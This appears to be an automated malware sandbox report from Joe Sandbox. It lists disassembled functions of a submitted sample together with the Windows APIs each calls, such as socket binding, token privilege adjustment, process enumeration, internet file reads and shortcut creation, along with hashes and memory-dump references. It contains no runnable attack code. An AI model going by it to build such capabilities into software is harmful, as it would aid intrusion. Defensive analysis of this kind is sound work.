                                                                  • Opcode ID: 6cbb92edaf938d2af027334615e25f5471cd9e1c9f0d3ee06b6298446196cf4c
                                                                  • Instruction ID: bf2990fbb9ab008c88e765b7984fcaa492f60b5535cdc30a4b822daf32f1b45b
                                                                  • Opcode Fuzzy Hash: 6cbb92edaf938d2af027334615e25f5471cd9e1c9f0d3ee06b6298446196cf4c
                                                                  • Instruction Fuzzy Hash: 3F517B756046069FD714DF29C491EAAB3F8FF49320F104529EA5ACB3A1DB30ED48CB91
                                                                  Function 00966747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00967D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00967DB6
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0096679E
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009667C7
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00966800
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0096680D
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00966821
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 99427753-0
                                                                  • Opcode ID: a907dae42ab6b7d66dd3e22bb0150ab2bb040cb6f6fed36375a5c2efc6c95011
                                                                  • Instruction ID: 4a337f64492c8836c3ab44fb7eb6b9ceab5ca760476b2533d8d1dbe51079628d
                                                                  • Opcode Fuzzy Hash: a907dae42ab6b7d66dd3e22bb0150ab2bb040cb6f6fed36375a5c2efc6c95011
                                                                  • Instruction Fuzzy Hash: A041B675600214AFDB50BF788C86F7E77A8EF45754F048568FA59EB3D2CA709D008B92
                                                                  Function 00975376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: 5ba770680495b149966c69d2c3ac50df0dfa02f71951190bb5136a9499b02078
                                                                  • Instruction ID: 4be4774a4b5fbc32ac155ddcc77eba1e694b2e2b49e271f5adac59ee945d4fcd
                                                                  • Opcode Fuzzy Hash: 5ba770680495b149966c69d2c3ac50df0dfa02f71951190bb5136a9499b02078
                                                                  • Instruction Fuzzy Hash: 6011E233314914ABDB206F26DC44B2A7B9CFF847A0B028438F84ED7261CBB09D418AA1
                                                                  Function 009480A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009480C0
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009480CA
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009480D9
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009480E0
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009480F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 238dc26cd0d5cb975274b5a0c52e6b4a13f43bb43de78dc33ae9d9eab350353c
                                                                  • Instruction ID: 96856c377195b1e161a5b29c6326dd02ccbc6513c4f3a9497ef8eb0f358c983e
                                                                  • Opcode Fuzzy Hash: 238dc26cd0d5cb975274b5a0c52e6b4a13f43bb43de78dc33ae9d9eab350353c
                                                                  • Instruction Fuzzy Hash: 64F0443126C204EFDB101F65DC9DE6B3BACFF8A759F400026F549D6150CA619C41EA60
                                                                  Function 0095C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0095C432
                                                                  • CoCreateInstance.OLE32(00982D6C,00000000,00000001,00982BDC,?), ref: 0095C44A
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • CoUninitialize.OLE32 ref: 0095C6B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                  • String ID: .lnk
                                                                  • API String ID: 2683427295-24824748
                                                                  • Opcode ID: ab0d0addd0b0b8ce9673b0530d5596c5042bf5eed33e10ee544ff12cae5474b8
                                                                  • Instruction ID: 5ccb73e9665f372fb329655c0dbf9f4bc34e74258010b944767d937586138bde
                                                                  • Opcode Fuzzy Hash: ab0d0addd0b0b8ce9673b0530d5596c5042bf5eed33e10ee544ff12cae5474b8
                                                                  • Instruction Fuzzy Hash: BBA11A71104209AFD700EF68C891EBBB7A8FF85354F004929F695D7192DB71AA49CB62
                                                                  Function 008F4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4AD0), ref: 008F4B45
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008F4B57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  • Opcode ID: 37fe8dc8f03887b7c77d5b24ee274aea56b0b75f1803450326c83a52e471eb0b
                                                                  • Instruction ID: 78b33b9367859c10e64fd157a174feb880902e629dbe391ba519719f4ff9097e
                                                                  • Opcode Fuzzy Hash: 37fe8dc8f03887b7c77d5b24ee274aea56b0b75f1803450326c83a52e471eb0b
                                                                  • Instruction Fuzzy Hash: 21D01736A28717CFD7209F72E839B1677E4EF453A5F11C87A948EE6150E670E8C0CA54
                                                                  Function 00903030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: 75af97773acc1e9affee804fa5fa882d14d7f2da3adf7e5a5eff47ace391d8a4
                                                                  • Instruction ID: 6e1c5914e0225fa090e0b10a1b69b7c29944efc31e9c541f6df1f7e66c576744
                                                                  • Opcode Fuzzy Hash: 75af97773acc1e9affee804fa5fa882d14d7f2da3adf7e5a5eff47ace391d8a4
                                                                  • Instruction Fuzzy Hash: CD227B716083019FC724DF28C891B6AB7E8FF89710F10892DF59A9B291DB75E944CF92
                                                                  Function 0096EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0096EE3D
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0096EE4B
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0096EF0B
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0096EF1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                  • String ID:
                                                                  • API String ID: 2576544623-0
                                                                  • Opcode ID: c6a73370822b2c61cbf6813f2671e627eb99056321cff8e6fdc7236a28d250bc
                                                                  • Instruction ID: b2de34a8ca004598f08f167cce9c8ece42ec43b1a0d424ab69b270cbc8a3744a
                                                                  • Opcode Fuzzy Hash: c6a73370822b2c61cbf6813f2671e627eb99056321cff8e6fdc7236a28d250bc
                                                                  • Instruction Fuzzy Hash: AB517B71508714ABD310EF28D885E6BBBE8FF98750F50482DF695D72A1EB70A904CB92
                                                                  Function 0094E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0094E628
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($|
                                                                  • API String ID: 1659193697-1631851259
                                                                  • Opcode ID: 1bb777553ddb0cd29a3ba738e9642da36efe71c0ed9266a6f47c95c1c28863f4
                                                                  • Instruction ID: 0839a98cc88992210104738916a3270dbe919cdac0065fa2a52471d50f1d6c56
                                                                  • Opcode Fuzzy Hash: 1bb777553ddb0cd29a3ba738e9642da36efe71c0ed9266a6f47c95c1c28863f4
                                                                  • Instruction Fuzzy Hash: 31320575A007059FDB28CF59C481EAAB7F1FF48320B15C56EE89ADB3A1E770A941CB44
                                                                  Function 009622EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0096180A,00000000), ref: 009623E1
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00962418
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  • Opcode ID: 31894a5849e70c2a5f99fd182fbe4c7d3ff4d80c54e3c4441693a05c1adac628
                                                                  • Instruction ID: e690068419b59e254dd9ac3fa2ff6cac67e6e447cb2169f8b593d4d3f468595f
                                                                  • Opcode Fuzzy Hash: 31894a5849e70c2a5f99fd182fbe4c7d3ff4d80c54e3c4441693a05c1adac628
                                                                  • Instruction Fuzzy Hash: 1141F571A04A09BFEB10DF95DC81FFB77BCEB80714F10406AF605A6250EB759E819660
                                                                  Function 0095B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0095B40B
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0095B465
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0095B4B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1682464887-0
                                                                  • Opcode ID: ce2f6bf8965010048ec5271fe28fecde3c0d0407add1953fb8118468ae7765ee
                                                                  • Instruction ID: bf009b8bf2673427a787ecc98ac40b75f35894a6f9f2676e8882777071075f7e
                                                                  • Opcode Fuzzy Hash: ce2f6bf8965010048ec5271fe28fecde3c0d0407add1953fb8118468ae7765ee
                                                                  • Instruction Fuzzy Hash: FE215E35A10108EFCB00EFA5D881AEDBBB8FF49310F1480A9E905EB361DB319955CB51
                                                                  Function 009487E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094882B
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00948858
                                                                  • GetLastError.KERNEL32 ref: 00948865
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: fe91c794b11c40db41171e0678f5a4f84e4364a35c1313a6ab14974f540f4d84
                                                                  • Instruction ID: f31f729c07da7eef260fd2f0cdbac9a1bfe80358f99fdedb17b76c8b75167874
                                                                  • Opcode Fuzzy Hash: fe91c794b11c40db41171e0678f5a4f84e4364a35c1313a6ab14974f540f4d84
                                                                  • Instruction Fuzzy Hash: 60116DB2514309AFE728DFA4EC85D6BB7BCEB45710B20852EE45997341EA71AC808B60
                                                                  Function 0094874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00948774
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0094878B
                                                                  • FreeSid.ADVAPI32(?), ref: 0094879B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: c59743ce473897e3db4bde33b5e85d44775c210a9fb4afce102ee2b7dcf11e08
                                                                  • Instruction ID: fd526a0f80dcb413c6a9bed4cc9f54b4e8643870e6ece6bd80c3e919e431dcfa
                                                                  • Opcode Fuzzy Hash: c59743ce473897e3db4bde33b5e85d44775c210a9fb4afce102ee2b7dcf11e08
                                                                  • Instruction Fuzzy Hash: ACF04976A5530CBFDF00DFF4DC99EAEBBBCEF08301F1044A9A905E2281E6716A449B50
                                                                  Function 0095C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0095C6FB
                                                                  • FindClose.KERNEL32(00000000), ref: 0095C72B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: 888279cfedfe66faee8f38bec63310142f8d241a2807b73635cfe6fa51e46b87
                                                                  • Instruction ID: 5016260cb75dda178ebfea2526527e0f606744ee1e905c055a23f057e203cea5
                                                                  • Opcode Fuzzy Hash: 888279cfedfe66faee8f38bec63310142f8d241a2807b73635cfe6fa51e46b87
                                                                  • Instruction Fuzzy Hash: BA11A1726146049FDB10DF29C845A2AF7E8FF89361F00852EF9A9D7291DB30AC05CF81
                                                                  Function 0095A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00969468,?,0097FB84,?), ref: 0095A097
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00969468,?,0097FB84,?), ref: 0095A0A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: 2dfeaa84f71a8d19138de2b2359209aff5ce85216c1e89afb745f1513832104c
                                                                  • Instruction ID: 402a0d01c33b94d0fa6d87cea4faa4ea8803cc63f8203e4ab657f0cd2ac2e000
                                                                  • Opcode Fuzzy Hash: 2dfeaa84f71a8d19138de2b2359209aff5ce85216c1e89afb745f1513832104c
                                                                  • Instruction Fuzzy Hash: 07F0E23511422DABDB20AFA4DC48FFA736CFF09361F004265F908D6181C6309944CBA1
                                                                  Function 009481CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00948309), ref: 009481E0
                                                                  • CloseHandle.KERNEL32(?,?,00948309), ref: 009481F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: 710ff10d636f2071bf0ba55d32572f489cb9a1b756a8ad0b378c30d4500ff145
                                                                  • Instruction ID: 6a771293e0e1ebafd36eb9768b23b13f7f501a670079d652584faecf6ff03f87
                                                                  • Opcode Fuzzy Hash: 710ff10d636f2071bf0ba55d32572f489cb9a1b756a8ad0b378c30d4500ff145
                                                                  • Instruction Fuzzy Hash: 2EE0EC72014614AFE7252B71EC09EB77BEEEF44350714882DF8AA94470DB62ACE1EB10
                                                                  Function 0091A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00918D57,?,?,?,00000001), ref: 0091A15A
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0091A163
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
